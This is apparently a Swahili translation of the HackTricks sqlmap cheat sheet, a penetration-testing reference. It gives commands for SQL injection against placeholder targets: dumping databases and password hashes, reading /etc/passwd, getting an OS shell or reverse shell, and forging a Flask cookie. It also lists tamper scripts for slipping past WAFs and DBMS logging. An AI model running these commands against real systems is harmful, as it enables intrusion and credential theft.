SQLMap - Cheatsheet

Reading time: 9 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Msingi wa hoja za maelekezo kwa SQLmap

Kawaida

bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Retrieve Information

Internal

bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

DB data

bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Kwa kutumia SQLMapping ni chombo cha vitendo kinachozalisha amri na kutoa muonekano kamili, wa msingi na wa juu, kwa SQLMap. Inajumuisha ToolTips zinazofafanua kila kipengele cha chombo, zikielezea kila chaguo ili uweze kuboresha na kuelewa jinsi ya kuitumia kwa ufanisi na kwa ufanisi.

Mahali pa kuingiza

Kutoka kwa Burp/ZAP kukamata

Kamata ombi na uunde faili ya req.txt

bash
sqlmap -r req.txt --current-user

GET Request Injection

bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

bash
sqlmap -u "http://example.com" --data "username=*&password=*"

Injections katika Vichwa na Mbinu Nyingine za HTTP

bash
#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Onyesha mfuatano wakati sindano inafanikiwa

bash
--string="string_showed_when_TRUE"

Ongeza mbinu ya kugundua

Ikiwa umepata SQLi lakini sqlmap haikugundua, unaweza kulazimisha mbinu ya kugundua kwa kutumia args kama --prefix au --suffix, au ikiwa ni ngumu zaidi, kuiongeza kwenye payloads zinazotumika na sqlmap katika /usr/share/sqlmap/data/xml/payloads/time_blind.xml kwa mfano kwa msingi wa muda kipofu.

Eval

Sqlmap inaruhusu matumizi ya -e au --eval kuchakata kila payload kabla ya kuisafirisha na python oneliner. Hii inafanya iwe rahisi na haraka kuchakata kwa njia maalum payload kabla ya kuisafirisha. Katika mfano ufuatao flask cookie session imeandikwa na flask kwa siri inayojulikana kabla ya kuisafirisha:

bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Shell

bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Soma Faili

bash
--file-read=/etc/passwd

Tembelea tovuti kwa SQLmap na kuji-exploit kiotomatiki

bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Uingizaji wa Pili

bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Soma chapisho hili kuhusu jinsi ya kufanya sindano za pili rahisi na ngumu na sqlmap.

Kubadilisha Sindano

Weka kiambishi

bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Kichwa cha Kwanza

bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Msaada wa kutafuta sindano ya boolean

bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

Kumbuka kwamba unaweza kuunda tamper yako mwenyewe katika python na ni rahisi sana. Unaweza kupata mfano wa tamper katika Second Order Injection page here.

bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
TamperMaelezo
apostrophemask.pyHubadilisha herufi ya apostrofi na sawa yake ya UTF-8 yenye upana kamili
apostrophenullencode.pyHubadilisha herufi ya apostrofi na sawa yake isiyo halali ya unicode mara mbili
appendnullbyte.pyHuongeza herufi ya NULL byte iliyokodishwa mwishoni mwa payload
base64encode.pyHubadilisha herufi zote katika payload iliyotolewa kuwa Base64
between.pyHubadilisha opereta kubwa kuliko ('>') na 'NOT BETWEEN 0 AND #'
bluecoat.pyHubadilisha herufi ya nafasi baada ya taarifa ya SQL na herufi halali ya nasibu. Kisha hubadilisha herufi = na opereta LIKE
chardoubleencode.pyHubadilisha mara mbili url-herufi zote katika payload iliyotolewa (sio kusindika zilizokodishwa tayari)
commalesslimit.pyHubadilisha matukio kama 'LIMIT M, N' na 'LIMIT N OFFSET M'
commalessmid.pyHubadilisha matukio kama 'MID(A, B, C)' na 'MID(A FROM B FOR C)'
concat2concatws.pyHubadilisha matukio kama 'CONCAT(A, B)' na 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.pyHubadilisha url-herufi zote katika payload iliyotolewa (sio kusindika zilizokodishwa tayari)
charunicodeencode.pyHubadilisha unicode-url-herufi zisizokodishwa katika payload iliyotolewa (sio kusindika zilizokodishwa tayari). "%u0022"
charunicodeescape.pyHubadilisha unicode-url-herufi zisizokodishwa katika payload iliyotolewa (sio kusindika zilizokodishwa tayari). "\u0022"
equaltolike.pyHubadilisha matukio yote ya opereta sawa ('=') na opereta 'LIKE'
escapequotes.pyHuondoa kukwama kwa nukuu (' na ")
greatest.pyHubadilisha opereta kubwa kuliko ('>') na sawa yake ya 'GREATEST'
halfversionedmorekeywords.pyHuongeza maoni ya MySQL yenye toleo kabla ya kila neno muhimu
ifnull2ifisnull.pyHubadilisha matukio kama 'IFNULL(A, B)' na 'IF(ISNULL(A), B, A)'
modsecurityversioned.pyHuongeza maelezo kamili ya swali na maoni yenye toleo
modsecurityzeroversioned.pyHuongeza maelezo kamili ya swali na maoni yasiyo na toleo
multiplespaces.pyHuongeza nafasi nyingi kuzunguka maneno muhimu ya SQL
nonrecursivereplacement.pyHubadilisha maneno muhimu ya SQL yaliyowekwa awali na uwakilishi yanayofaa kwa kubadilisha (mfano. .replace("SELECT", "")) filters
percentage.pyHuongeza alama ya asilimia ('%') mbele ya kila herufi
overlongutf8.pyHubadilisha herufi zote katika payload iliyotolewa (sio kusindika zilizokodishwa tayari)
randomcase.pyHubadilisha kila herufi ya neno muhimu na thamani ya kesi nasibu
randomcomments.pyHuongeza maoni ya nasibu kwa maneno muhimu ya SQL
securesphere.pyHuongeza mfuatano maalum wa kuundwa
sp_password.pyHuongeza 'sp_password' mwishoni mwa payload kwa ajili ya kuficha kiotomatiki kutoka kwa kumbukumbu za DBMS
space2comment.pyHubadilisha herufi ya nafasi (' ') na maoni
space2dash.pyHubadilisha herufi ya nafasi (' ') na maoni ya dash ('--') ikifuatiwa na mfuatano wa nasibu na mstari mpya ('\n')
space2hash.pyHubadilisha herufi ya nafasi (' ') na herufi ya pound ('#') ikifuatiwa na mfuatano wa nasibu na mstari mpya ('\n')
space2morehash.pyHubadilisha herufi ya nafasi (' ') na herufi ya pound ('#') ikifuatiwa na mfuatano wa nasibu na mstari mpya ('\n')
space2mssqlblank.pyHubadilisha herufi ya nafasi (' ') na herufi ya nasibu kutoka seti halali ya herufi mbadala
space2mssqlhash.pyHubadilisha herufi ya nafasi (' ') na herufi ya pound ('#') ikifuatiwa na mstari mpya ('\n')
space2mysqlblank.pyHubadilisha herufi ya nafasi (' ') na herufi ya nasibu kutoka seti halali ya herufi mbadala
space2mysqldash.pyHubadilisha herufi ya nafasi (' ') na maoni ya dash ('--') ikifuatiwa na mstari mpya ('\n')
space2plus.pyHubadilisha herufi ya nafasi (' ') na plus ('+')
space2randomblank.pyHubadilisha herufi ya nafasi (' ') na herufi ya nasibu kutoka seti halali ya herufi mbadala
symboliclogical.pyHubadilisha opereta za AND na OR na sawa zao za alama (&& na
unionalltounion.pyHubadilisha UNION ALL SELECT na UNION SELECT
unmagicquotes.pyHubadilisha herufi ya nukuu (') na mchanganyiko wa byte nyingi %bf%27 pamoja na maoni ya jumla mwishoni (ili kufanya ifanye kazi)
uppercase.pyHubadilisha kila herufi ya neno muhimu na thamani ya herufi kubwa 'INSERT'
varnish.pyHuongeza kichwa cha HTTP 'X-originating-IP'
versionedkeywords.pyHuweka kila neno muhimu lisilo la kazi ndani ya maoni ya MySQL yenye toleo
versionedmorekeywords.pyHuweka kila neno muhimu ndani ya maoni ya MySQL yenye toleo
xforwardedfor.pyHuongeza kichwa cha HTTP bandia 'X-Forwarded-For'

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks